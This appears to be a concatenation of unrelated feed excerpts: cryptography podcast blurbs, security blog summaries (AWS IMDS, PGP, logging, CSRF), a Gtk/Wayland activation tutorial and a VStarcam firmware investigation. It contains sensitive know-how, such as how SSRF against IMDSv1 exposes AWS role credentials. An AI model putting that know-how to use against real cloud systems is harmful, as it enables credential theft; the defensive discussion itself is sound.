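	rest := sealed[len(commitTag):]
	return gcm.Open(nil, rest[:gcm.NonceSize()], rest[gcm.NonceSize():], nil)
}

func main() {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	sealed, err := seal(key, []byte("attack at dawn"))
	if err != nil {
		panic(err)
	}
	pt, err := open(key, sealed)
	fmt.Println(string(pt), err)
}
```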
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Ange Albertini and Stefan Kölbl.
Before there was Signal, before there was WhatsApp, the realm of secure encrypted messaging was ruled by the Off-the-Record secure messaging protocol, created as an alternative to PGP that introduced security properties like forward secrecy and deniability that were considered exotic at the time.
Now, more than a decade later, Off-the-Record messaging, or OTR, has been largely sidelined by Signal variants. But a small team of cryptography engineers is still working on pushing Off-the-Record messaging forward by focusing on use cases that they argue aren’t sufficiently covered by Signal. But what even is deniability, and how much does it matter in the real-world context of secure messaging? Sofía Celi joins us in today’s episode to talk about this and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Sofía Celi.
Elliptic-curve signatures have become a widely used cryptographic primitive in secure messaging, TLS, and cryptocurrencies, thanks to their speed advantages over more traditional signature schemes. However, virtually all signature schemes are known to be susceptible to misuse, especially when information about the nonce is leaked to an attacker.
LadderLeak is a new attack that exploits side channels present in ECDSA, claiming to allow real-world breaking of ECDSA with less than a bit of nonce leakage. But what does “less than a bit” mean in this context? Is LadderLeak really that effective at breaking ECDSA, with so little information to go on? Joining us this episode are LadderLeak co-authors Akira Takahashi, Mehdi Tibouchi and Yuval Yarom to discuss these questions and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Akira Takahashi, Mehdi Tibouchi, and Yuval Yarom.
Secure messaging protocols like Signal have succeeded at making end-to-end encryption the norm in messaging more generally. Whether you’re using WhatsApp, Wire, Facebook Messenger’s Secret Chat feature, or Signal itself, you’re benefiting from end-to-end encryption across all of your messages and calls, and it’s so transparent that most users aren’t even aware of it!
One area in which current secure messaging protocols have stalled, however, is the ability to scale secure conversations to groups of dozens, hundreds and even thousands of people. But the IETF’s Messaging Layer Security, or MLS, effort aims to make that happen. Bringing together a collaboration between Wire, Mozilla, Cisco, Facebook, as well as academia, MLS wants to become the TLS of secure messaging, and make it possible to hold secure conversations scaling to thousands of participants.
But what are the real-world implementation risks involved? Are conversations even worth securing when you’ve got hundreds of potential leakers?
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Raphael Robert.
Zero-knowledge proofs have been a notorious research target ever since Zcash and other cryptocurrencies invented lots of new use cases for them. Range proofs, Bulletproofs, you name it – all kinds of zero-knowledge mechanisms have received more and more attention.
But what about using zero-knowledge proofs to prove the existence of a software vulnerability? That way, you can prove that you have a zero-day without risking it getting stolen, putting both vulnerability researchers as well as companies looking to secure their software in a better position!
That’s what Dr. David Archer from Galois is working on, and he joins me today on Cryptography FM to discuss this new interesting use case, and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: David Archer.
The NIST post-quantum competition has started a race for post-quantum cryptography. As a result, we’ve seen a great deal of research into alternative hard mathematical problems to use as a basis for public-key cryptography schemes. Lattice-based cryptography! Error-correcting code based cryptography! And of course, isogeny-based cryptography, have all received enormous renewed interest as a result.
While the NIST post-quantum competition recently announced that it’s favoring candidates founded on lattice-based cryptography, it also encouraged further research into isogeny-based cryptography. But what even is isogeny-based cryptography? Is it as intimidating as it sounds? And what’s keeping it behind on NIST’s list of post-quantum primitives?
Today, it’s my pleasure to be joined by isogeny-based cryptography researchers Luca de Feo and Hart Montgomery, co-authors of a recent publication titled “Cryptographic Group Actions and Applications”, which Luca affectionately described as an “isogeny-based cryptography for dummies” paper. We’ll be discussing isogeny-based cryptography and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Hart Montgomery and Luca De Feo.
Anyone who’s looked at the French civil code -- or, God forbid, the French tax code -- will tell you that it takes more than a mere human mind to decipher its meaning, given how it’s been growing and growing ever since it was established by Napoleon hundreds of years ago.
Well, Catala is a new project that takes this adage perhaps a bit too literally, by applying formal methods -- a field increasingly seen as immediately adjacent to cryptography -- to the French tax code! Catala aims to provide a “domain-specific programming language designed for deriving correct-by-construction implementations from legislative texts.” -- what that means is that you’ll be able to describe the tax code in a programming language, and get a proven-correct processing of your tax returns in that same language, too!
This episode of Cryptography FM is not directly about cryptography. Instead we’ll be covering a highly related and definitely interesting tangent: can we use the same formal methods that have recently proven the security of protocols like Signal and TLS in order to formally verify our tax returns? And, more importantly, can today’s guest help me pay less taxes?!
Joining us today is doctoral student Denis Merigoux, to talk about Catala, and more.
Links:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Denis Merigoux.
Ever since its introduction in 2012, the BLAKE hash function has been renowned for achieving performance matching and even exceeding MD5 while still maintaining a high security margin.
While the original BLAKE did make it as a finalist to the NIST SHA3 competition, Keccak was ultimately selected. But this hasn’t discouraged the BLAKE team, who in January of this year, published BLAKE3, promising to be even faster than BLAKE2 thanks to a highly parallelizable design and fewer rounds.
But wait, what exactly is a parallelizable hash function? Isn't a lower round number risky? And heck, how do you even design a hash function?! Joining me today are two of the four BLAKE3 authors: Jack O’Connor and Jean-Philippe Aumasson, to discuss these questions and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Jack O'Connor and Jean-Philippe Aumasson.
Aside from working on a competition for standardizing post-quantum primitives, the United States National Institute of Standards and Technology, or NIST, has also organized a lightweight cryptography competition meant to attract designs for symmetric primitives, such as hash functions and authenticated encryption ciphers, that work in use cases where even AES is not an adequately speedy standard.
Among the submissions to NIST’s lightweight cryptography competition was Gimli, a family of cryptographic primitives comprising a hash function and an authenticated encryption with associated data (AEAD) cipher. Named after the Lord of the Rings Dwarf warrior and authored by a long list of accomplished cryptographers, Gimli looked like a promising submission -- until a team of cryptanalysts at INRIA produced a surprising set of results outlining some potentially serious weaknesses in Gimli’s current design.
In their paper, which recently was declared as the winner of the IACR Asiacrypt 2020 Best Paper Award, Antonio Flórez Gutiérrez, Gaëtan Leurent, María Naya-Plasencia, Léo Perrin, André Schrottenloher and Ferdinand Sibleyras from the INRIA research institute here in France presented some very strong results against Gimli’s security.
But why does Gimli even matter? Why aren’t AES, ChaCha20-Poly1305, and BLAKE2 enough, even for the most performance-constrained scenarios? And how did this team of researchers succeed in obtaining such serious results on a family of cryptographic primitives that was certainly designed with care and expertise?
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Léo Perrin.
TLS 1.3 has been widely praised as a major upgrade to the Transport Layer Security protocol responsible for securing the majority of Web traffic. But one area in which TLS 1.3 seems to be lacking is its potential for resistance to attacks that utilize quantum computing – computers that, theoretically, could factor the products of large primes and solve the discrete logarithm problem in relatively short periods of time, significantly affecting the security of TLS 1.3.
Today however, we’re discussing an interesting new paper, to be published at this year’s ACM CCS, which introduces KEMTLS: a modified version of TLS 1.3 that uses Key Encapsulation Mechanisms, or KEMs, instead of signatures for server authentication, thereby providing a sort of “post-quantum TLS”.
But what even are KEMs? Are quantum computers even a thing that we should be worried about? On the first ever episode of Cryptography FM, we’ll be hosting Dr. Douglas Stebila and PhD Candidate Thom Wiggers to discuss these questions and more.
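For listeners wondering about that first question, the sketch below shows the generic shape of a KEM in Go. The interface is my own illustration rather than any particular library's API; the KEMTLS-specific detail is that the server authenticates implicitly, by being the only party able to decapsulate the client's ciphertext, instead of by producing a handshake signature.

```go
package kemsketch

// KEM captures the generic shape of a key encapsulation mechanism.
// This is an illustrative interface, not any particular library's API.
type KEM interface {
	// GenerateKeyPair produces a public/private key pair.
	GenerateKeyPair() (publicKey, privateKey []byte, err error)

	// Encapsulate uses the peer's public key to produce a ciphertext and a
	// fresh shared secret that only the private-key holder can recover.
	Encapsulate(publicKey []byte) (ciphertext, sharedSecret []byte, err error)

	// Decapsulate recovers the same shared secret from the ciphertext.
	Decapsulate(privateKey, ciphertext []byte) (sharedSecret []byte, err error)
}

// In a KEMTLS-style handshake (simplified): the client encapsulates to the
// public key in the server's certificate, both sides derive traffic keys
// from the shared secret, and the server's ability to decapsulate is what
// proves possession of the private key -- no handshake signature is needed.
```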
Dr. Douglas Stebila is an Associate Professor of cryptography in the Department of Combinatorics & Optimization at the University of Waterloo in Waterloo, Ontario, Canada. His research focuses on improving the security of key exchange protocols and Internet cryptography protocols such as TLS and SSH, including the development of quantum-resistant solutions. His previous work on the integration of elliptic curve cryptography in TLS has been deployed on hundreds of millions of web browsers and servers worldwide.
Thom Wiggers is a PhD Candidate at the Institute of Computing and Information Sciences at Radboud University in The Netherlands. He is working on the interactions of post-quantum cryptography with protocols, under the supervision of Dr. Peter Schwabe, who is also a co-author of the research work that we’re going to discuss today.
Links to discussed papers:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Douglas Stebila and Thom Wiggers.
In Go, go.mod acts as both manifest and lockfile. There is never a reason to look at go.sum.
We apply a transparency log to a centralized keyserver step-by-step, in less than 500 lines, with privacy protections, anti-poisoning, and witness cosigning.
I delivered my traditional Go Cryptography State of the Union talk at GopherCon US 2025 in New York. It goes into everything that happened at the intersection of Go and cryptography over the last year.
Surprisingly (to me), Claude Code debugged my new ML-DSA implementation faster than I would have, finding the non-obvious low-level issue that was making Verify fail.
Introducing the set of standards that Geomys maintainers strive to uphold in our professional activity as open source maintainers.
Project compromises have common root causes we can mitigate: phishing, control handoff, and unsafe GitHub Actions triggers.
Geomys sometimes acts as a maintainer of last resort for critical Go projects. Recently, we took over the bluemonday HTML sanitizer, and built upgrade paths for the gorilla/csrf library.
Cross-Site Request Forgery countermeasures can be greatly simplified using request metadata provided by modern browsers.
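The metadata in question is the browser's Fetch Metadata headers, most notably Sec-Fetch-Site. A minimal Go middleware along those lines might look like the sketch below; it is my own illustration of the general idea, not the implementation discussed in the post, and the strictness choices (what to do when the header is absent, how to treat "same-site") are assumptions you would want to tune.

```go
package main

import (
	"fmt"
	"net/http"
)

// crossOriginGuard rejects state-changing requests that a modern browser
// labels as cross-site via the Sec-Fetch-Site header. Requests without the
// header (old browsers, non-browser clients) are allowed through here; a
// real deployment would decide how strict to be about that case.
func crossOriginGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		switch r.Method {
		case http.MethodGet, http.MethodHead, http.MethodOptions:
			next.ServeHTTP(w, r) // safe methods are not CSRF targets
			return
		}
		switch r.Header.Get("Sec-Fetch-Site") {
		case "", "same-origin", "none": // "none" = user-initiated navigation
			next.ServeHTTP(w, r)
		default: // "cross-site" (and, under this policy, "same-site")
			http.Error(w, "cross-origin request rejected", http.StatusForbidden)
		}
	})
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/transfer", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "ok")
	})
	http.ListenAndServe("localhost:8080", crossOriginGuard(mux))
}
```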
Test coverage of delicate Go cryptographic assembly through a new mutation testing framework.
Encrypting files with passkeys, using the WebAuthn prf extension and the TypeScript age implementation.
We are thrilled to announce a major milestone for Latacora: we have achieved the Amazon Web Services (AWS) Advanced Tier Services Partner status within the AWS Partner Network (APN).
This designation reflects Latacora’s technical expertise and diligence in delivering exceptional cloud security and compliance solutions to our clients, and confirms that we have successfully completed a rigorous validation process demonstrating a proven track record of customer success delivered by a team of AWS-certified professionals with specialized technical capabilities.
Large language models, agents, and Model Context Protocol (MCP) are impossible to escape in today’s tech climate. At Latacora, we take a thoughtful and pragmatic approach towards new technologies like these. Are they going to solve all the world’s problems? No. Is it important that we understand them and be able to build software that integrates into emerging ecosystems? Yes!
Internally we’ve built an MCP server to query our Datomic databases using natural language, but now we’re open-sourcing the underlying Clojure library so others can easily build robust MCP servers for the emerging LLM agent ecosystem too.
Update: after years of being on the wish list of a ton of top AWS teams, AWS released a built-in version of this feature about two weeks after we published this. Never let it be said gentle ribbing doesn’t work. Also, thanks AWS! We meant it when we said that the only thing better than having something easy to deploy was not needing to deploy anything at all. Everything in this post about workload identity is still relevant but you should probably use upstream’s implementation unless you have a good reason not to (for example, private validators for whom you need a VPC endpoint).
AWS ECS is a widely-adopted service across industries. To illustrate the scale and ubiquity of this service, over 2.4 billion Amazon Elastic Container Service tasks are launched every week (source) and over 65% of all new AWS containers customers use Amazon ECS (source).
There are two primary launch types for ECS: Fargate and EC2. The choice between them depends on factors like cost, performance, operational overhead, and the variability of your workload.
Security tools are often designed to highlight specific issues by consuming APIs and applying predefined logic. Each tool implements its own data structures, storage formats, and evaluation logic. While effective in narrow contexts, this approach creates challenges for teams managing a diverse toolset. Moreover, most tools are optimized to fetch only the data needed for specific findings, limiting their utility in broader contexts such as incident response or historical analysis.
Security rarely tops the priority list for startups - but that doesn’t make it optional.
Running a startup is no small feat. Founders face enormous pressure to address a never-ending list of priorities (finding market fit, fundraising, launching new features, scaling infrastructure, etc.), so security often becomes a “later” issue… until it can’t be. Even when companies know they need help, the breadth of the problem can be intimidating. Application security, cloud infrastructure, third-party vendors, compliance, cryptography: any resource-constrained startup will be hard-pressed to find a unicorn hire who can own all these responsibilities equally well.
Every other week, regulators around the world bombard their constituents with new data protection laws and acronyms. As the person who was just voluntold you’re now responsible for privacy at your startup, in addition to all your other duties and without any additional resources, how can you possibly be expected to keep up—let alone contextualize that information to maintain compliance?
Privacy, at its core, is an ethical issue, which means the solution to your privacy challenges is deceptively simple: do the right thing and be transparent with your customers. That’s it. That’s what everyone means when they say “privacy by design.”
This post is the second in a series about logging and audit trails from a security perspective. For the first post in the series, see Lessons in Logging: Chopping Down Security Risks Using Audit Trails
If you’re looking to level up your security practices, logging is a good place to focus your attention. Just as logging is a core pillar of observability, comprehensive audit trails are a core pillar of a strong security program. Logs and audit trails are separate but overlapping concepts, and most companies can improve their security posture by investing in this area.
Latacora collects and analyzes data about services our clients use. You may have read about our approach to building security tooling, but the tl;dr is we make requests to all the (configuration metadata) read-only APIs available to us and store the results in S3. We leverage the data to understand our clients' infrastructure and identify security issues and misconfigurations. We retain the files (“snapshots”) to support future IR/forensics efforts.
This approach has served us well, but the limited scope of a snapshot meant there was always a problem of first needing to figure out which files to look at. We love aws s3 sync and grep as much as anyone but security analysis requires looking for complex relationships between resources; text search is, at best, only a Bloom filter. What we really wanted was a performant way to ask any question across all the data we have for a client that would support complex queries using logic programming.
Exciting news! Latacora is teaming up with Vanta to supercharge your compliance game. We now combine Latacora’s security expertise with Vanta’s compliance platform to help you reach your compliance goals faster than ever. As a Vanta managed service provider (MSP), Latacora can help you tackle your compliance goals quickly and efficiently, freeing you to focus on growing your business and building trust with your customers.
Here’s the scoop on why using Vanta through Latacora is a game-changer:
One of our favorite blog posts is our “crypto right answers” post. It’s intended to be an easy-to-use guide to help engineers pick the best cryptography choices without needing to go too far down a rabbit hole. With post-quantum cryptography (PQC) recently transitioning from an academic research topic to a more practical cryptography concern we figured it’s time for an update of our cryptography recommendations.
One thing that makes recommending PQC challenging is that historically, we’ve been able to provide “better” answers for classical cryptography. Faster and bigger hashes, stronger password KDFs, easier-to-use primitives… These things all have the same fundamental “shape”: you can take an existing design and drop in something else to make it better. MD5 and BLAKE3 are not comparable in strength, but you can just use BLAKE3 in place of MD5 and get something that’s just far better with minimal API changes.
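To make the “same shape” point concrete, here is a tiny Go illustration of that drop-in property. The third-party module lukechampine.com/blake3 and its Sum256 helper are assumptions used for the example; any BLAKE3 binding with a one-shot digest function would serve equally well.

```go
package main

import (
	"crypto/md5"
	"fmt"

	"lukechampine.com/blake3" // assumed BLAKE3 binding; any one-shot digest API works
)

func main() {
	data := []byte("hello world")

	// Old: 128-bit MD5 digest (broken, shown only for comparison).
	oldDigest := md5.Sum(data)

	// New: 256-bit BLAKE3 digest -- same "bytes in, fixed-size array out" shape.
	newDigest := blake3.Sum256(data)

	fmt.Printf("md5:    %x\nblake3: %x\n", oldDigest, newDigest)
}
```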
We traveled to Toronto this year to attend RWC 2024. The conference was held at TIFF Lightbox in the city’s downtown; the venue is the headquarters of the Toronto International Film Festival and contains five cinema rooms. RWC is a single-track conference and there’s no hard requirement that talks are backed by papers. Each RWC includes the Levchin Prize ceremony for major achievements in applied cryptography, several invited talks and the lightning talks session.
When people talk about PBKDFs (Password-Based Key Derivation Functions), it is usually either in the context of secure password storage or in the context of deriving cryptographic keys from potentially low-entropy passwords. The Password Hashing Competition (PHC, 2013-2015) was an open competition to design new password hashing algorithms, with Argon2 emerging as its winner. Apart from achieving general hash security, many of the candidates focused on resistance to parallel attacks on available hardware such as GPUs.
This post is the first in a series about logging and audit trails from a security perspective. For the next post in the series, see Lessons in Logging, Part 2: Mapping Your Path to a Mature Security Program with Logs and Audit Trails
At Latacora, we bootstrap security practices. We partner with companies that frequently have minimally developed security programs, work with them to figure out the right security practices for their current size, and then help them evolve and scale those practices as their business matures.
Most “security tools” today are composed of code that consumes an API and applies predefined logic to identify issues. This is generally accomplished by:
Integrating third party tools into our monitoring platform isn’t always straightforward, as each tool:
The last Strange Loop conference was held September 21-22, 2023 at St. Louis Union Station. The conference is targeted towards developers; the speakers are often sharing their knowledge on new and inventive ways to use technology. At our sponsor booth at Union Station, attendees asked two (okay, three) questions most often:
The first one isn’t hard for the folks from our team: Latacora is a consultancy that bootstraps security for startups. We have a team of experts helping our clients with most security-related things: application security, cloud security, corporate security, compliance, and more. We also have a team of security architects, cryptographers, and project managers supporting our clients. These professionals are equipped with power tools built to make their jobs more efficient and to help our clients improve their security posture.
2024-12-17 Updated to include Declarative Policies
Compute resources in AWS (for example, EC2 instances, ECS tasks/services, etc.) get access to AWS credentials, such as temporary instance role credentials, via the Instance Metadata Service (IMDS). The compute resources use these credentials to access other AWS services such as SQS, DynamoDB and Secrets Manager.
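For reference, here is a minimal sketch (not from any particular tool; the role name is hypothetical) of how a workload retrieves those credentials using the IMDSv2 token flow:
#!/usr/bin/env python3
# Minimal sketch of fetching instance role credentials from IMDS.
# IMDSv1 would answer the credentials GET directly; IMDSv2 requires a
# session token first, which is what makes SSRF-style theft harder.
import json
import urllib.request

IMDS = "http://169.254.169.254"
ROLE = "my-instance-role"  # hypothetical role name

# IMDSv2: obtain a session token via PUT, then send it with every request.
token_request = urllib.request.Request(
    f"{IMDS}/latest/api/token",
    method="PUT",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
)
token = urllib.request.urlopen(token_request).read().decode()

credentials_request = urllib.request.Request(
    f"{IMDS}/latest/meta-data/iam/security-credentials/{ROLE}",
    headers={"X-aws-ec2-metadata-token": token},
)
credentials = json.loads(urllib.request.urlopen(credentials_request).read())
print(credentials["AccessKeyId"], credentials["Expiration"])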
There was originally only one version of IMDS, now called "v1," which unfortunately many people still use. The technical risks and high-profile incidents (the Capital One breach comes to mind) associated with v1, as well as the existence of v2, are well-documented. When an application hosted on an EC2 instance is vulnerable to SSRF, XXE or RCE, attackers can likely steal the temporary AWS credentials of the IAM role configured for the instance. This service is a particularly interesting target for attackers:
So, you plan to sell your startup’s product to big companies one day. Congratu-dolences!
Really, that’s probably the only reason you should care about this article. If that’s not you, go forth and live your life! We’ll ask no more of your time.
For the rest of you: Industry people talk about SOC2 a lot, and it’s taken on a quasi-mystical status, not least because it’s the product of the quasi-mystical accounting industry. But what it all boils down to is: eventually you’ll run into big-company clients demanding a SOC2 report to close a sale. You know this and worry about it.
Email is unsafe and cannot be made safe. The tools we have today to encrypt email are badly flawed. Even if those flaws were fixed, email would remain unsafe. Its problems cannot plausibly be mitigated. Avoid encrypted email.
Technologists hate this argument. Few of them specialize in cryptography or privacy, but all of them are interested in it, and many of them tinker with encrypted email tools.
Most email encryption on the Internet is performative, done as a status signal or show of solidarity. Ordinary people don’t exchange email messages that any powerful adversary would bother to read, and for those people, encrypted email is LARP security. It doesn’t matter whether or not these emails are safe, which is why they’re encrypted so shoddily.
Last year we did a blog post on interservice auth. This post is mostly about authenticating consumers to an API. That’s a related but subtly different problem: you can probably impose more requirements on your internal users than your customers. The idea is the same though: you’re trying to differentiate between a legitimate user and an attacker, usually by getting the legitimate user to prove that they know a credential that the attacker doesn’t.
Cryptography engineers have been tearing their hair out over PGP’s deficiencies for (literally) decades. When other kinds of engineers get wind of this, they’re shocked. PGP is bad? Why do people keep telling me to use PGP? The answer is that they shouldn’t be telling you that, because PGP is bad and needs to go away.
There are, as you’re about to see, lots of problems with PGP. Fortunately, if you’re not morbidly curious, there’s a simple meta-problem with it: it was designed in the 1990s, before serious modern cryptography. No competent crypto engineer would design a system that looked like PGP today, nor tolerate most of its defects in any other design. Serious cryptographers have largely given up on PGP and don’t spend much time publishing on it anymore (with a notable exception). Well-understood problems in PGP have gone unaddressed for over a decade because of this.
(This is an introductory level analysis of a scheme involving RSA. If you’re already comfortable with Bleichenbacher oracles you should skip it.)
Someone pointed me at the following suggestion on the Internet for encrypting secrets to people based on their GitHub SSH keys. I like the idea of making it easier for people to leverage key material and tools they already have. The encryption instructions are:
echo "my secret" > message.txt
curl -q "https://github.com/${USER}.keys" \
| head -n 1 \
> recipient.pub
ssh-keygen -e -m pkcs8 -f recipient.pub > recipient.pem
openssl rsautl \
-encrypt \
-pubin \
-inkey recipient.pem \
-ssl \
-in message.txt \
-out encrypted.txt
Anything using an openssl command line tool makes me a little uncomfortable. Let’s poke at it a little.
The ROCA RSA key generation flaw or ROBOT, the “Return Of Bleichenbacher” attack: which is most deserving of the “Best Cryptographic Attack” Pwnie award at the 2018 Black Hat USA conference? Only one can survive. Let us consider.
Assume for the moment that it’s down to those two: ROBOT and ROCA. But first take a moment to consider the best cases for the “runners up”. They are all excellent; it was a very good year for crypto research.
Update: I don’t know if we can take credit for it or if it’s random chance, but I note OpenSSH changed its default in the release after this blog post. The system works!
The eslint-scope npm package got compromised recently, stealing npm credentials from your home directory. We started running tabletop exercises: what else would you smash-and-grab, and how can we mitigate that risk?
Most people have an RSA SSH key lying around. That SSH key has all sorts of privileges: typically logging into prod and GitHub access. Unlike an npm credential, an SSH key is encrypted, so perhaps it's safe even if it leaks? Let's find out!
TL;DR: if I ever told you to use Noise, I probably meant Noise_IK and should have been more specific.
The Noise protocol is one of the best things to happen to encrypted protocol design. WireGuard inherits its elegance from Noise. Noise is a cryptography engineer’s darling spec. It’s important not to get blindsided while fawning over it and to pay attention to where implementers run into trouble. Someone raised a concern I had run into before: Noise has a matrix.
Default shells usually end in $. Unless you're root and it's #. That tradition has been around forever: people recognized the need to highlight you're not just some random shmoe.
These days we have lots of snazzy shell magic. You might still su, but you’re more likely to sudo. We still temporarily assume extra privileges. If you have access to more than one set of systems, like production and staging, you probably have ways of putting on a particular hat. Some combination of setting an environment variable, adding a key to ssh-agent, or assuming an AWS role with aws-vault. You know, so you don’t accidentally blow away prod.
Modern applications tend to be composed from relationships between smaller applications. Secure modern applications thus need a way to express and enforce security policies that span multiple services. This is the “server-to-server” (S2S) authentication and authorization problem (for simplicity, I’ll mash both concepts into the term “auth” for most of this post).
Designers today have a lot of options for S2S auth, but there isn’t much clarity about what the options are or why you’d select any of them. Bad decisions sometimes result. What follows is a stab at clearing the question up.
If you’re like me, you think of Google Groups as the Usenet client turned mailing list manager. If you’re a GCP (Google Cloud Platform) user or maybe one of a handful of SAML (Security Assertion Markup Language) users you probably know Google Groups as an access control mechanism. The bad news is we’re both right.
This can blow up if permissions on those groups aren't set right. Your groups were probably originally created by a sleep-deprived founder way before anyone was worried about access control. They've been lovingly handcrafted and never audited since. Let's say their configuration is, uh, “inconsistent”. If an administrator adds people to the right groups as part of their on-boarding, it's not obvious when group membership is secretly self-service. Even if someone can't join a group, they might still be able to read it.
Amidst the hubbub of the Efail PGP/SMIME debacle yesterday, the WireGuard project made a pretty momentous announcement: a MacOS command line version of the WireGuard VPN is now available for testing, and should stabilize in the coming few months. I’m prepared to be wrong, but I think that for a lot of young tech companies, this might be the biggest thing to happen to remote access in decades.
WireGuard is a modern, streamlined VPN protocol that Jason Donenfeld developed based on Trevor Perrin’s Noise protocol framework. Imagine a VPN with the cryptographic sophistication of Signal Protocol and you’re not far off. Here are the important details:
It’s weird to say this but a significant part of the value we provide clients is filling out Dumb Security Questionnaires (hereafter DSQs, since the only thing more irritating than a questionnaire is spelling “questionnaire”).
Daniel Miessler complains about DSQs, arguing that self-assessment is an intrinsically flawed concept.
Meh. I have bigger problems with them.
First, most DSQs are terrible. We get on calls with prospective clients and tell them “these DSQs were all first written in the early 1990s and lovingly handed down from generation to generation of midwestern IT secops staff.” Oh, how clients laugh and laugh. But, not joking. That's really how those DSQs got written.
We’re less interested in empowering developers and a lot more pessimistic about the prospects of getting this stuff right.
There are, in the literature and in the most sophisticated modern systems, “better” answers for many of these items. If you're building for low-footprint embedded systems, you can use STROBE and build a sound, modern, authenticated encryption stack entirely out of a single SHA-3-like sponge construction. You can use NOISE to build a secure transport protocol with its own AKE. Speaking of AKEs, there are, like, 30 different password AKEs you could choose from.
One of the biggest sore points with Wayland is its focus stealing protection. The idea is good: an application should not be able to bring itself into focus at an unexpected time, only when the currently active application allows it. Support is still lacking, however, which might also be due to Gtk/Glib implementing the required XDG activation protocol but not really documenting it. It took me a bit of time to figure this out without any public information; this article will hopefully make things easier for other people.
The main idea behind the XDG activation protocol is that focus transfer from one application to another requires consent. With X11 a file manager could just launch the browser for an HTML file and the browser would immediately take focus, even if that browser was already running. With Wayland the file manager has to indicate that the browser is allowed to take focus.
It does that by giving the browser its XDG activation token, typically via XDG_ACTIVATION_TOKEN environment variable. The browser can then use that activation token to prove consent and take focus. For this to work the protocol has to be supported on both ends: the file manager must know how to retrieve an activation token and pass it on via XDG_ACTIVATION_TOKEN environment variable, and the browser has to know how to use that token.
The receiving side has been implemented in Gtk with merge request 7118 and is available starting with Gtk 4.14.6 and 4.15.1. This is the unproblematic part: it is handled automatically and doesn’t require the application developer to change anything.
The sending side has been implemented in Gtk with merge request 3502 and Glib with merge request 3090, so it is available starting with Gtk 4.10.0 and Glib 2.75.1. This is the part which might require some changes to the application – changes that I couldn’t find documented anywhere.
When a Gtk-based file manager wants to open an HTML file, this usually involves Gio.AppInfo and g_app_info_launch or similar:
/* Look up the default handler for HTML files and launch it through an app
   launch context, so that an XDG activation token gets passed along. */
GAppInfo* app_info = g_app_info_get_default_for_type("text/html", TRUE);
GList *list = NULL;
list = g_list_append(list, "https://example.com/");
GdkDisplay *display = gdk_display_get_default();
GdkAppLaunchContext* context = (display ?
gdk_display_get_app_launch_context(display) :
NULL);
g_app_info_launch_uris(app_info, list, G_APP_LAUNCH_CONTEXT(context), NULL);
g_list_free(list);
g_clear_object(&context);
g_clear_object(&app_info);
This should normally transfer focus to the browser automatically. That app launch context parameter is important, however: you cannot omit it. Also, this will only work if the desktop file corresponding to the AppInfo has the StartupNotify key set – the Gtk developers decided to merge the handling of X11 startup notifications and XDG activations.
But what if you are using something like the execve function to start applications? You can still set the XDG_ACTIVATION_TOKEN environment variable manually. It's important to know, however, that the token has to be retrieved via g_app_launch_context_get_startup_notify_id (please pardon my C):
char** extend_env(char** env, char* value)
{
int env_size = 0;
while (env[env_size])
env_size++;
char **new_env = malloc((env_size + 2) * sizeof(char*));
memcpy(new_env, env, env_size * sizeof(char*));
new_env[env_size++] = value;
new_env[env_size++] = NULL;
return new_env;
}
char *argv[] = {"/usr/bin/firefox", "https://example.com/", NULL};
char *default_env[] = {NULL};
char **env = default_env;
gboolean should_free_env = FALSE;
GdkDisplay *display = gdk_display_get_default();
if (display)
{
GdkAppLaunchContext* context = gdk_display_get_app_launch_context(display);
env = g_app_launch_context_get_environment(G_APP_LAUNCH_CONTEXT(context));
char* sn_id = g_app_launch_context_get_startup_notify_id(
G_APP_LAUNCH_CONTEXT(context), NULL, NULL);
if (sn_id)
{
char token_var[256];
snprintf(token_var, sizeof(token_var), "XDG_ACTIVATION_TOKEN=%s", sn_id);
env = extend_env(env, token_var);
should_free_env = TRUE;
}
}
if (!fork())
execve(argv[0], argv, env);
if (should_free_env)
free(env);
As before, it's worth noting that the Gtk developers decided to merge the handling of X11 startup notifications and XDG activations, hence the function name to retrieve the token. The last two parameters of g_app_launch_context_get_startup_notify_id are unused for Wayland; they are only relevant for X11 startup notifications. If you pass in an AppInfo instance here you might actually get an X11 notification ID back that you should write into the DESKTOP_STARTUP_ID environment variable. However, if you have an AppInfo instance it should be easier to use one of its launch functions as described above, which will do this automatically.
VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.
So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customers' passwords.
A reminder: “P2P” functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only be addressed by configuring the network firewall to deny internet access.
Not every VStarcam camera has “VStarcam” printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more.
Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra.
VStarcam cameras have a mechanism to deliver firmware updates (LookCam cameras prove that this shouldn’t be taken for granted). The app managing the camera will request update information from an address like http://api4.eye4.cn:808/firmware/1.2.3.4/EN where 1.2.3.4 is the firmware version. If a firmware update is available the response will contain a download server and a download path. The app sends these to the device which then downloads and installs the updated firmware.
